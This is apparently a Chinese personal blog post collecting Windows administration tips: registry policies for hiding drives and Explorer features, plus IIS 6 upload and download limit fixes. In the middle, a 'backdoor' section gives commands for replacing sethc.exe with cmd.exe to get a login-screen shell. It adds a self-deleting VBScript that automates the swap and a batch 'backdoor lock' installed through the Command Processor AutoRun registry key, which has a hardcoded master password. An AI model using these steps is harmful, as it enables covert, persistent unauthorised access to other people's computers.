meisw's blog

 隐藏驱动器，在我的电脑里看不到，在注册表里找到以下分支
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

在右边新建双字节的分支NoDrives （说明：在这里使用的是2的N次方来代表一个驱动器名称，而非寻常的A、B、C、D……，下面就给出各驱动器名与2的N次方的对应关系，以方便各位：A: 1, B: 2,C: 4, D: 8, E: 16, F: 32, G: 64,H: 128, I: 256,J: 512,K: 1024, L: 2048, M: 4096, N: 8192,O: 16384, P: 32768, Q:65536,R: 131072,S: 262144,T: 524288, U: 1048576, V: 2097152, W:4194304,X: 8388608, Y: 16777216, Z: 33554432按照上面的取值规则，如果你要隐藏A、B、C、I四个驱动器，输入263即可，因为263=1+2+4+256，如果你要隐藏所有驱动器，输入67108863。要以十进制来输入数值数据）

以上只是隐藏，要禁止访问，还要在同一个位置新建双字节分支NoViewOnDrive键，设置方法和上面的一样，效果是禁止访问指定的驱动器。

其它的限制！！可以参考下以！

提示：大部分值的数据默认是0，一般修改为1，所以不每个标明其如何修改了，如有特殊情况会标出~


＜1＞.Menushowdelay ?? 提高子菜单速度

＜2＞.NoClose ?? 是否隐藏“关闭系统”

＜3＞.UpdateMode ?? 是否自动刷新窗口内容

＜4＞.NoSetFolders ?? 是否隐藏“设置”

＜5＞.NoRecentDocsMenu ?? 是否显示“文档”

＜6＞.ClearRecentDocsOnExit ?? 是否自动清除“文档内容”

＜7＞.NoFind ?? 是否显示“查找”

＜8＞.NoRecentDocsHistory ?? 是否锁定“文档”

＜9＞.NoRun ?? 是否隐藏“运行”

＜10＞.NoLogOff ?? 是否隐藏“注销”

＜11＞.HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun ?? “自启动”程序

＜12＞.HKEY_LOCAL_MACHINE与HKEY_LOCAL_ROOT下 ?? 右键“新建”选项

＜1＞3.HKEY_LOCAL_ MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace ?? 可删除桌面系统图标

＜14＞.NoDesktop ?? 隐藏桌面

＜15＞.NoNetHood ?? 隐藏“网上邻居”

＜16＞.PaintDesktopVersion ?? 隐藏系统版本号

＜18＞NoSMMyDocs--禁止`开始`-＞`文档`中的我的文档选项


＜20＞NoRunasInstallPrompt--不要申请其它凭证

＜21＞NoHardwareTab--隐藏`系统属性`中的`硬件`卡

＜22＞NoShellSearchButton--屏蔽`资源管理器`工具栏中的`搜索`按钮

＜23＞DontShowSuperHidden --不显示文件夹里的隐藏系统文件复选框

＜24＞AllowFrenchEncryption

＜25＞NoEncryption

＜26＞NoCustomizeThisFolder

＜27＞NoWebView

＜28＞ForceStartMenuLogoff--禁止在`开始`显示注销项

＜29＞NoNetworkConnections--`开始`的`设置`中`网络和拨号连接`被隐藏(控面中不隐藏

但也禁用)

＜30＞NoChangeMappedDriveComment

＜31＞NoChangeMappedDriveLabel

------下面的四个在uninstall子键下

＜32＞NoWindowsSetupPage--`添加删除windows组件`

＜33＞NoAddPage--`添加新程序`项被隐藏

＜34＞NoRemovePage--`更改或删除程序`项被隐藏

＜35＞NoAddRemovePrograms--屏蔽`添加删除程序`项

＜36＞ShowPostSetup

＜37＞AddRemoveProgs

＜38＞EnumWorkgroup

＜39＞NoControlPanel--禁用`控制面板`同时在`开始`-＞`设置`中的`控面`选项被隐藏

＜40＞MaxRecentDocs--`文档`中的记录数(`我的文档`也算一项,所以要从二开始)

＜41＞SeparateProcess

＜42＞IntelliMenus--在`任务栏和开始菜单属性`中隐藏`使用个性化菜单`复选框(同失也

禁用该功能)

＜43＞MemCheckBoxInRunDlg--`运行`对话框中加入`在单独内存空间运行`,

作用:启动多个16位进程或dos进程时将单独启动一个VDM进程，从而不会造成地址冲突

＜44＞FindComputers

＜45＞NoSyncAll

＜46＞NoFolderOptions--`设置`-没有`文件夹选项`

＜47＞NoChangeStartMenu--`开始`菜单中禁止点右键

＜48＞NoWindowsUpdate--`设置`-没有`WINDOWS UPDATE`

＜49＞NoSetActiveDesktop--仅是`开始`-`设置`-没有`活动桌面`选项

＜50＞GreyMSIAds--从`开始`禁用不可用的windows安装服务程序的快捷方式

＜51＞NoForgetSoftwareUpdate

＜52＞NoMSAppLogo5ChannelNotify

＜53＞ForceCopyACLWithFile--强制拷贝ACL(仿问控制例表)在方件拷贝时(??)

＜54＞NoResolveTrack--对于不正确的lnk系统先找文件ID号

＜55＞NoResolveSearch--禁止自动查找匹配无目标的快捷方式（综合查询）

--------------ActiveDesktop-----------＜＜这是一个子选项＞＞

＜56＞NoEditingComponents--(显示属性-web页选项卡-无`编辑`和`重置`)

＜57＞NoMovingBands--(当你新建一个工具栏并放入状态栏时你将不能把它移出来)

＜58＞NoCloseDragDropBands--(禁止你关闭新建的工具栏和系统自带的快速启动栏)

＜59＞NoClosingComponents--(禁止关闭桌面某一活动内容)

＜60＞NoDeletingComponents--(显示属性-web页选项卡-无`删除`)

＜61＞NoAddingComponents--(显示属性-web页选项卡-无`新建`)

＜62＞NoComponents--(无`显示`属性中的`web页选项卡`)

＜63＞NoChangingWallPaper--(显示属性-背景选项卡中禁止更改背景图片并且在

ie中点右键时也无法选择`设置为墙纸`选项)

＜64＞NoHTMLWallPaper--(禁用html格式的墙纸)

＜65＞ActiveDesktop--(主键名)

------------------------------------------------------------

＜66＞NoCustomizeWebView

＜67＞ClassicShell--(禁止定义桌面风格具体包括系统自带的快速启动栏被完全的隐藏

并且不能添加文件夹选项中的常规选项卡中windows桌面更新不能选择了还有关

机选项中多了个注销单选框有点搞笑!)

＜68＞ClearRecentDocsOnExit--退出时清除`文档`中的历史记录)

＜69＞NoFavoritesMenu--`开始`中无`收藏夹`

＜70＞NoActiveDesktopChanges--显示属性中无web选项卡且背景选项卡中墙纸不能为htm

l格式但在ie点右键时可以选`设为桌面项`)

＜71＞NoActiveDesktop--(这个是最重要的了必须要有它才能真正的禁止activedesktop

其中包括显示属性中无web选项卡且背景选项卡中墙纸不能为html格式

，桌面点右键没有`活动桌面`选项但是在`开始`菜单的`设置`又有,但在ie

点右键时可以选`设为桌面项`不过又不能显示出来)

＜72＞NoRecentDocsMenu--`开始`中无`文档`

＜73＞NoRecentDocsHistory--`开始`中无`文档`中历史记录

＜74＞NoInternetIcon--桌面隐藏IE图标

＜75＞NoFileAssociate

＜76＞NoNTSecurity

＜77＞NoDisconnect

＜78＞NoSettingsWizards

＜79＞NoNetConnectDisconnect--关闭当前的网络连接指的是映射的网络驱动器同时在`网

络邻居`和`我的电脑`点右键都没有断开和映射网络驱动器选项

＜80＞NoViewContextMenu--在桌面和资源管理器中无右键同时也不能查看文件属性(同时

禁用shift+f10)但在工具栏或是ie中有用

＜81＞NoTrayContextMenu--在状态栏包括`开始`按钮上禁用右键但是

在最右边的托盘图标和快速启动栏的图标上可以点右键

＜82＞NoWebMenu

＜83＞LinkResolveIgnoreLinkInfo--禁止使用绝对路来解释出错的快捷方式

＜84＞NoCommonGroups--隐藏`程序`-＞`附件`中的公共部分如画图等快捷方式(存放在doc

ument and settingall users`开始菜单`文件夹下)

＜85＞EnforceShellExtensionSecurity--使用未经许可的外壳扩展(右键扩展菜单)要提示

,如何确认:win2k自动搜索程序的数字证书,经过确认的

clsid放在hklmsmwcshell extensionapproved下

＜86＞NoRealMode--禁用dos方式(?)

＜87＞WinOldApp--关机没有转为纯dos方式(?)

＜88＞MyDocsOnNet

＜89＞NoStartMenuSubFolders--隐藏`开始菜单`上部的`用户文件夹`,(存放在document

andsetting用户名`开始菜单`文件夹下)

＜90＞NoAddPrinter--(`我的电脑`-`打印机`-无`添加打印机`)

＜91＞NoDeletePrinter--(`我的电脑`-`打印机`-无``删除打印机`)

＜92＞NoPrinterTabs--(无打印机属性中的`常规`和`详细资料`两个选项)

＜93＞RestrictRun--设置只能运用的程序(特殊)

＜94＞NoStartBanner--无`单击这里开始`的提示

＜95＞NoNetHood--隐藏`网上邻居`

＜96＞NoDriveTypeAutoRun--禁止光盘自动运行(按类型禁止)

＜97＞NoDriveAutoRun--禁止光盘自动运行(按盘符禁止)

＜98＞NoDrives--隐藏驱动器

＜99＞NoFind--隐藏`收搜`

＜100＞NoDesktop--隐藏`桌面`所有项目

＜101＞NoSetTaskbar--禁用`任务栏`右键属性及设置-＞没有任务栏和开始菜单

＜102＞NoSetFolders--设置-＞没有制面板及打印机

＜103＞NoFileMenu--隐藏`资源管里器`里的`文件`菜单

＜104＞NoSaveSettings--不保存桌面设置如任务栏的位置之类

＜105＞NoClose--隐藏`关闭系统`

＜106＞NoRun--隐藏`运行`

＜107＞Explorer(主键)

＜108＞NoComputersNearMe--隐藏`网上邻居`中的`邻近的计算机`

＜109＞ForceActiveDesktopOn--禁止桌面-＞右键-＞活动桌面中的`显示web内容`选项

＜110＞DisableCurrentUserRunOnce--禁止处理注册表中的开机启动项

＜111＞DisableLocalMachineRunOnce--同上

＜112＞DisableCurrentUserRun--同上

＜113＞DisableLocalMachineRun--同上

＜114＞NoEncryptOnMove--?

＜115＞NoWinKeys--在`资管`中禁用热键(?)

＜116＞NoSMHelp--隐藏`开始`中的`帮助`选项

＜117＞NoSMBalloonTip --＞不显示`单击这里开始`

＜118＞DisallowCpl--指定不能使用的cpl文件(特殊)

＜119＞RestrictCpl--指定只能使用的cpl文件(特殊)

＜120＞NoWelcomeScreen

＜121＞DisallowRun--指定不能使用的可执行文件(特殊)

＜122＞NoRecentDocsNetHood--禁止仿问过的共享资源自动加到`网上邻居`

＜123＞NoManageMyComputerVerb--隐藏`我的电脑`-＞右键菜单中的`管理选项`(compmgmt.

msc)

＜124＞PromptRunasInstallNetPath--为网络安装申请凭证(?)

后门原理： 
在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。 
XP： 
将安装源光盘弹出（或将硬盘上的安装目录改名) 
cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 
VISTA： 
takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F 
然后按XP方法替换文件 
在登录界面按5此SHIFT，出来cmd shell，然后…… 
后门扩展：
[复制此代码]CODE:
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)   
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  

第二句最有意思了.自动应答....以前就遇到过类似的问题 
再更新.加个自删除,简化代码...  
[复制此代码]CODE:
On Error Resume Next   
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) 

后门锁扩展： 
allyesno注：可以采用cmd 锁 来进行cmdshell的密码验证 
用下面的后门锁的方法是 把代码保存为bdlock.bat 
然后修改注册表位置即可 
[复制此代码]CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="bdlock.bat"  
@Echo Off  
title 后门登陆验证  
color a  
cls  
set temprandom=%RANDOM%  
echo 请输入验证码:%temprandom%  
set/p check=  
if "%check%"=="%temprandom%%temprandom%" goto passcheck  
if "%check%"=="%temprandom%" (  
rem 后门服务器验证  
rem 如果没有后门验证服务器请rem注释掉下一行代码  
if exist \192.168.8.8\backdoor$\pass goto passcheck  
)  
echo 验证失败  
pause  
exit  
:passcheck  
echo 验证成功  
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
Set passcmdlock=http://blog.csdn.net/freexploit/  
:allyesno  
Set Errorlevel=>nul  
Echo 请输入验证密码？  
Set password=allyesno Is a pig>nul  
Set/p password=  
rem 万能密码  
if "%password%"=="allyesno is a sb" goto endx  
If %time:~1,1%==0 Set timechange=a  
If %time:~1,1%==1 Set timechange=b  
If %time:~1,1%==2 Set timechange=c  
If %time:~1,1%==3 Set timechange=d  
If %time:~1,1%==4 Set timechange=e  
If %time:~1,1%==5 Set timechange=f  
If %time:~1,1%==6 Set timechange=g  
If %time:~1,1%==7 Set timechange=h  
If %time:~1,1%==8 Set timechange=i  
If %time:~1,1%==9 Set timechange=j  
set/a sum=%time:~1,1%+%time:~1,1%  
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
Echo 请联系客服咨询正确密码！&Goto allyesno  
:End  
Set password=>nul  
Set Errorlevel=>nul  
Echo  
:endx 

Serv-U溢出漏洞解决方案

每次关闭windows 2003系统时，你总会发现关机原因提示框，不厌其烦“抢占”你的视线，这让喜欢一气呵成关机的你，浑身不自在，不得己，你必须进行如下“手术”，才能“赶走”烦人的关机原因提示窗口。

依次执行……开始……运行……在运行框中输入"gpedit.msc"命令，这时弹出组策略编辑界面，在该界面中，用鼠标左键双击“计算机配置”文件夹｜"管理模板"文件夹｜"系统"文件夹。

在对应"系统"文件夹窗口中，选中"关闭事件跟踪程序"，并用鼠标左键双击，在随后弹出的窗口中，选中“已禁用”选项，最后点击"确定"按钮，就可以与烦人的关机原因提示框“byebye"了。

改过好多次了,但每次都不记得具体的路径,都要google一下.记下了,以后不用搜了

关于win 2003 iis中不能下载rmvb的解决方法：

网站的属性>HTTP头->MIME类型->新建，扩展名填入.rmvb，MIME类型是application

Windows 2003，当在IIS6上下载(/上传)大文件时，

会出现错误(log 文件中）：80004005 Response_Buffer_Limit_Exceeded。

原因：IIS6 有一个缺省的设置：AspBufferingLimit= 4194304 是4M。
解决办法：将AspBufferingLimit的值增大到合适的大小。

步骤：
1． 修改IIS设置，允许直接编辑配置数据库
管理工具->IIS管理器里，选择计算机，右键，选择属性，然后选中“Enable Direct Metabase Edit”.
2． 修改IIS配置文件
1). 先在服务管理器里关闭iis admin service服务
         管理工具->服务->iis admin service->停止。
2). 用文本编辑器打开C:\Windows\System32\Inesrv\下的Metabase.xml文件
         注意：修改文件之前请先备份。

3). 修改对下载文件大小限制
         找到AspBufferingLimit，把它修改为你所需的大小。
         例如：AspBufferingLimit="8388608" （8M）
修改对上传文件大小限制

         找到ASPMaxRequestEntityAllowed 把他修改为需要的值，默认为204800，即200K 把它修改为你所需的大小。如：8388608（8M）

         例如：AspRequestQueueMax="8388608"

4). 然后开启www服务

     管理工具->服务->World Wide Web Publishing Service->开启

备注：

       也可以直接在控制台命令行运行 ADSUTIL.VBS更改此值。不用停止IIS。

       例如改为8M：运行“ADSUTIL.VBS SET W3SVC/AspBufferingLimit 8388608”

另外，可以在控制台命令行直接停止和启动IIS。

         停止：“Net stop iisadmin /y”
        启动：“Net start w3svc